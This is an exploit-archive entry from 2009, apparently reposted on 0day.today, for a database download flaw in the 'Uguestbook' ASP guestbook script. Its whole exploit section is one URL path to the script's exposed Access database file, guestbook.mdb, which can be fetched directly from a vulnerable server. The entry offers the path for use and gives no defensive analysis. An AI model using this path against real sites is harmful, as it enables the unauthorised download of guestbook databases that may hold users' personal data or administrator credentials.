id: 10494
date: 12/29/2009
title: Uguestbook DB Download Vulnerability
author: indoushka
cves: 

====================================
Uguestbook DB Download Vulnerability
====================================

========================================================================================                 
| # Title    : Asp Uguestbook DB Download Vulnerability                                |
| # Author   : indoushka                                                               |
| # Script   : Uguestbook !talian script                                               |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : DB                                                                      |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://server/Uguestbook/mdb-database/guestbook.mdb



#  0day.today [2023-03-21]  #